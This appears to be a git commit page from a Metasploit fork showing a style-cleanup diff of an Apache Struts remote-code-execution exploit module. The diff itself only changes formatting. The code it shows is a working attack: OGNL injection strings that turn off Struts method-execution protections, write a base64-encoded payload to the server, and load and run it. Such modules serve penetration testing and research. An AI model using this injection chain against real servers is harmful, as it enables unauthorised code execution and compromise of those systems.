adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Mass rubocop changes

Browse Source
This commit is contained in:
Spencer McIntyre
2025-12-17 17:11:13 -05:00
parent d4b196b309
commit 602adeb4c5
237 changed files with 4505 additions and 4446 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/http/struts_code_exec_parameters.rb
+12 -12
View File
@@ -102,19 +102,19 @@ class MetasploitModule < Msf::Exploit::Remote
splitted = datastore['GET_PARAMETERS'].split('&')
return retval if splitted.nil? || splitted.empty?
splitted.each { |item|
splitted.each do |item|
name, value = item.split('=')
# no check here, value can be nil if parameter is &param
decoded_name = name ? Rex::Text::uri_decode(name) : nil
decoded_value = value ? Rex::Text::uri_decode(value) : nil
decoded_name = name ? Rex::Text.uri_decode(name) : nil
decoded_value = value ? Rex::Text.uri_decode(value) : nil
retval[decoded_name] = decoded_value
}
end
retval
end
def execute_command(cmd)
junk = Rex::Text.rand_text_alpha(6)
inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
inject = '(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false),#_memberAccess["allowStaticMethodAccess"]'
inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
uri = normalize_uri(datastore['TARGETURI'])
resp = send_request_cgi({
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
# Set up generic values.
payload_exe = rand_text_alphanumeric(4 + rand(4))
payload_exe = rand_text_alphanumeric(rand(4..7))
append = false
# Now arch specific...
@@ -144,13 +144,13 @@ class MetasploitModule < Msf::Exploit::Remote
pl_exe = payload.encoded_jar.pack
exec_cmd = ''
exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
exec_cmd << '#q.setAccessible(true),#q.set(null,true),'
exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
exec_cmd << '#q.setAccessible(true),#q.set(null,false),'
exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),"
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
exec_cmd << 'null,new java.lang.Object[]{new java.lang.String[0]})'
when 'win'
pl_exe = generate_payload_exe
path = temp_path || './'
@@ -172,17 +172,17 @@ class MetasploitModule < Msf::Exploit::Remote
append = true
end
java_upload_part(pl_exe, payload_exe, append)
print_status("Executing payload")
print_status('Executing payload')
execute_command(chmod_cmd) if target['Platform'] == 'linux'
execute_command(exec_cmd)
register_files_for_cleanup(payload_exe)
end
def java_upload_part(part, filename, append = false)
cmd = ""
cmd = ''
cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
cmd << '#f.close()'
execute_command(cmd)
end